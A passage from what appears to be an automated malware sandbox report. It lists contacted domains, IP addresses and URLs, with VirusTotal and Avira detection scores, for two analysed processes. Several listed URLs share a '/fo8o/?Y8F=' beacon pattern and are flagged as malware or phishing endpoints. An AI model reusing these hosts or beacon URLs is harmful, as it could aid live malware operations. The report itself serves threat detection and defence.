natroredirect.natrocdn.com	0%	Virustotal	Browse
www.kasegitai.tokyo	7%	Virustotal	Browse
elettrosistemista.zip	11%	Virustotal	Browse
www.antonio-vivaldi.mobi	9%	Virustotal	Browse
www.shenzhoucui.com	9%	Virustotal	Browse
www.3xfootball.com	5%	Virustotal	Browse
www.donnavariedades.com	8%	Virustotal	Browse
www.joyesi.xyz	2%	Virustotal	Browse
www.b301.space	6%	Virustotal	Browse
www.magmadokum.com	9%	Virustotal	Browse
www.rssnewscast.com	6%	Virustotal	Browse
www.techchains.info	11%	Virustotal	Browse
www.empowermedeco.com	5%	Virustotal	Browse
www.liangyuen528.com	2%	Virustotal	Browse
www.elettrosistemista.zip	7%	Virustotal	Browse
www.k9vyp11no3.cfd	8%	Virustotal	Browse
www.goldenjade-travel.com	9%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://www.antonio-vivaldi.mobi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Zb05UwcAkaB2J1Kzvv1yGe3hS8juJnkbDr/1EuGpo+UJ9gA==&9brL_=BThPe0S0	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://reg.ru	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://www.reg.ru/whois/?check=&dname=www.b301.space&reg_source=parking_auto	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/?Y8F=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&9brL_=BThPe0S0	100%	Avira URL Cloud	malware
http://www.empowermedeco.com/fo8o/	8%	Virustotal		Browse
https://track.uc.cn/collect	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Virustotal		Browse
http://push.zhanzhang.baidu.com/push.js	0%	Avira URL Cloud	safe
http://www.660danm.top/fo8o/	100%	Avira URL Cloud	malware
https://donnavariedades.com/fo8o?Y8F=l	0%	Avira URL Cloud	safe
https://reg.ru	0%	Virustotal		Browse
https://www.reg.ru/whois/?check=&dname=www.b301.space&reg_source=parking_auto	0%	Virustotal		Browse
http://push.zhanzhang.baidu.com/push.js	1%	Virustotal		Browse
http://www.rssnewscast.com/fo8o/?Y8F=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&9brL_=BThPe0S0	0%	Avira URL Cloud	safe
http://www.magmadokum.com/fo8o/	0%	Avira URL Cloud	safe
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	0%	Avira URL Cloud	safe
http://www.rssnewscast.com/fo8o/	0%	Avira URL Cloud	safe
http://www.660danm.top/fo8o/	11%	Virustotal		Browse
http://www.kasegitai.tokyo	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/	100%	Avira URL Cloud	malware
http://www.rssnewscast.com/fo8o/	6%	Virustotal		Browse
https://hm.baidu.com/hm.js?	0%	Avira URL Cloud	safe
https://track.uc.cn/collect	0%	Virustotal		Browse
http://www.magmadokum.com/fo8o/	9%	Virustotal		Browse
http://www.kasegitai.tokyo	7%	Virustotal		Browse
https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am	0%	Avira URL Cloud	safe
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	0%	Virustotal		Browse
http://www.shenzhoucui.com/fo8o/	100%	Avira URL Cloud	malware
http://www.shenzhoucui.com/fo8o/?Y8F=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBSD8DGilcFUIaw9KGDa8hSIpxJ4Da6NkwMKTsgVvIjwNNkg==&9brL_=BThPe0S0	100%	Avira URL Cloud	malware
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/	12%	Virustotal		Browse
http://www.shenzhoucui.com/fo8o/	10%	Virustotal		Browse
http://www.goldenjade-travel.com/fo8o/	0%	Avira URL Cloud	safe
https://hm.baidu.com/hm.js?	0%	Virustotal		Browse
https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=	0%	Avira URL Cloud	safe
https://www.goldenjade-travel.com/fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPF	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Avira URL Cloud	safe
https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&	0%	Avira URL Cloud	safe
https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am	0%	Virustotal		Browse
http://www.donnavariedades.com/fo8o/?Y8F=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDTGgZiIm8sV5rhtCXud2beKoow48CYPqOXsFqBfVEoJ79g==&9brL_=BThPe0S0	0%	Avira URL Cloud	safe
http://www.b301.space/fo8o/?Y8F=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBMWUTkQYjuMJYaMZeWEVjYdmGCyAvzXT+cvLf21wqhucucw==&9brL_=BThPe0S0	0%	Avira URL Cloud	safe
http://www.antonio-vivaldi.mobi/fo8o/	0%	Avira URL Cloud	safe
http://www.goldenjade-travel.com/fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&9brL_=BThPe0S0	0%	Avira URL Cloud	safe
https://www.empowermedeco.com/fo8o/?Y8F=mxnR	100%	Avira URL Cloud	malware
http://www.magmadokum.com/fo8o/?Y8F=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&9brL_=BThPe0S0	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://zz.bdstatic.com/linksubmit/push.js	0%	Avira URL Cloud	safe
https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve	0%	Avira URL Cloud	safe
https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa	0%	Avira URL Cloud	safe
http://www.elettrosistemista.zip/fo8o/	100%	Avira URL Cloud	malware
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	0%	Avira URL Cloud	safe
http://www.donnavariedades.com/fo8o/	0%	Avira URL Cloud	safe
http://www.660danm.top/fo8o/?Y8F=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrINr9TZW+RNBVQYBQJyEcpoFJRXOlD4bLupvYs9MkX8JY0Q==&9brL_=BThPe0S0	100%	Avira URL Cloud	malware
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	0%	Avira URL Cloud	safe
https://www.sedo.com/services/parking.php3	0%	Avira URL Cloud	safe
https://musee.mobi/vivaldi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi	0%	Avira URL Cloud	safe
https://codepen.io/uzcho_/pens/popular/?grid_type=list	0%	Avira URL Cloud	safe
http://www.b301.space/fo8o/	0%	Avira URL Cloud	safe
https://codepen.io/uzcho_/pen/eYdmdXw.css	0%	Avira URL Cloud	safe
http://www.empowermedeco.com/fo8o/?Y8F=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&9brL_=BThPe0S0	100%	Avira URL Cloud	malware
https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a	0%	Avira URL Cloud	safe
http://www.kasegitai.tokyo/fo8o/?Y8F=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8tsmJ5wYjg7yHR75gTEM7bFlUHlp6xhVA3OjEJ21e5ZGGZA==&9brL_=BThPe0S0	100%	Avira URL Cloud	malware
http://www.3xfootball.com/fo8o/?Y8F=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&9brL_=BThPe0S0	0%	Avira URL Cloud	safe
http://www.techchains.info/fo8o/	100%	Avira URL Cloud	phishing
https://musee.mobi/vivaldi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAs	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.660danm.top	34.120.249.181	true	false	11%, Virustotal, Browse	unknown
empowermedeco.com	217.196.55.202	true	false	12%, Virustotal, Browse	unknown
shops.myshopify.com	23.227.38.74	true	false	0%, Virustotal, Browse	unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	0%, Virustotal, Browse	unknown
www.kasegitai.tokyo	202.172.28.202	true	false	7%, Virustotal, Browse	unknown
elettrosistemista.zip	195.110.124.133	true	false	11%, Virustotal, Browse	unknown
www.3xfootball.com	154.215.72.110	true	false	5%, Virustotal, Browse	unknown
www.shenzhoucui.com	104.206.198.212	true	false	9%, Virustotal, Browse	unknown
www.antonio-vivaldi.mobi	46.30.213.191	true	false	9%, Virustotal, Browse	unknown
www.goldenjade-travel.com	116.50.37.244	true	false	9%, Virustotal, Browse	unknown
www.rssnewscast.com	91.195.240.94	true	false	6%, Virustotal, Browse	unknown
www.techchains.info	66.29.149.46	true	false	11%, Virustotal, Browse	unknown
www.b301.space	194.58.112.174	true	false	6%, Virustotal, Browse	unknown
www.magmadokum.com	unknown	unknown	true	9%, Virustotal, Browse	unknown
www.donnavariedades.com	unknown	unknown	true	8%, Virustotal, Browse	unknown
www.joyesi.xyz	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.liangyuen528.com	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.empowermedeco.com	unknown	unknown	true	5%, Virustotal, Browse	unknown
www.k9vyp11no3.cfd	unknown	unknown	true	8%, Virustotal, Browse	unknown
www.elettrosistemista.zip	unknown	unknown	true	7%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.antonio-vivaldi.mobi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Zb05UwcAkaB2J1Kzvv1yGe3hS8juJnkbDr/1EuGpo+UJ9gA==&9brL_=BThPe0S0	false	Avira URL Cloud: safe	unknown
http://www.empowermedeco.com/fo8o/	true	8%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.elettrosistemista.zip/fo8o/?Y8F=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&9brL_=BThPe0S0	false	Avira URL Cloud: malware	unknown
http://www.660danm.top/fo8o/	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.rssnewscast.com/fo8o/?Y8F=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&9brL_=BThPe0S0	false	Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.rssnewscast.com/fo8o/	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.kasegitai.tokyo/fo8o/	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.shenzhoucui.com/fo8o/	false	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.shenzhoucui.com/fo8o/?Y8F=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBSD8DGilcFUIaw9KGDa8hSIpxJ4Da6NkwMKTsgVvIjwNNkg==&9brL_=BThPe0S0	false	Avira URL Cloud: malware	unknown
http://www.goldenjade-travel.com/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.donnavariedades.com/fo8o/?Y8F=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDTGgZiIm8sV5rhtCXud2beKoow48CYPqOXsFqBfVEoJ79g==&9brL_=BThPe0S0	false	Avira URL Cloud: safe	unknown
http://www.b301.space/fo8o/?Y8F=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBMWUTkQYjuMJYaMZeWEVjYdmGCyAvzXT+cvLf21wqhucucw==&9brL_=BThPe0S0	false	Avira URL Cloud: safe	unknown
http://www.antonio-vivaldi.mobi/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.goldenjade-travel.com/fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==&9brL_=BThPe0S0	false	Avira URL Cloud: safe	unknown
http://www.magmadokum.com/fo8o/?Y8F=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==&9brL_=BThPe0S0	false	Avira URL Cloud: safe	unknown
http://www.elettrosistemista.zip/fo8o/	false	Avira URL Cloud: malware	unknown
http://www.donnavariedades.com/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.660danm.top/fo8o/?Y8F=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrINr9TZW+RNBVQYBQJyEcpoFJRXOlD4bLupvYs9MkX8JY0Q==&9brL_=BThPe0S0	false	Avira URL Cloud: malware	unknown
http://www.b301.space/fo8o/	false	Avira URL Cloud: safe	unknown
http://www.empowermedeco.com/fo8o/?Y8F=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&9brL_=BThPe0S0	true	Avira URL Cloud: malware	unknown
http://www.3xfootball.com/fo8o/?Y8F=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==&9brL_=BThPe0S0	false	Avira URL Cloud: safe	unknown
http://www.kasegitai.tokyo/fo8o/?Y8F=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8tsmJ5wYjg7yHR75gTEM7bFlUHlp6xhVA3OjEJ21e5ZGGZA==&9brL_=BThPe0S0	false	Avira URL Cloud: malware	unknown
http://www.techchains.info/fo8o/	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://reg.ru	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/whois/?check=&dname=www.b301.space&reg_source=parking_auto	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://track.uc.cn/collect	netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://push.zhanzhang.baidu.com/push.js	netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.00000000053C0000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000044E0000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://donnavariedades.com/fo8o?Y8F=l	netbtugc.exe, 00000005.00000002.4478683134.0000000004BE6000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003D06000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.000000000459E000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000036BE000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.kasegitai.tokyo	HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4479572760.0000000004F7F000.00000040.80000000.00040000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://hm.baidu.com/hm.js?	netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.goldenjade-travel.com/fo8o/?Y8F=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPF	HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003208000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.empowermedeco.com/fo8o/?Y8F=mxnR	netbtugc.exe, 00000005.00000002.4478683134.0000000004F0A000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.000000000402A000.00000004.00000001.00040000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://zz.bdstatic.com/linksubmit/push.js	netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.00000000053C0000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000044E0000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	netbtugc.exe, 00000005.00000002.4478683134.0000000005552000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000004672000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	netbtugc.exe, 00000005.00000002.4480238914.0000000006190000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478683134.0000000004D78000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.0000000003E98000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://musee.mobi/vivaldi/fo8o/?Y8F=PTl5gU/3CD/Xhg5Nd1HWi	netbtugc.exe, 00000005.00000002.4478683134.000000000427A000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.000000000339A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sedo.com/services/parking.php3	HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000036BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000005.00000003.2365160839.0000000007BDE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000005.00000002.4478683134.00000000048C2000.00000004.10000000.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000002.4478121576.00000000039E2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
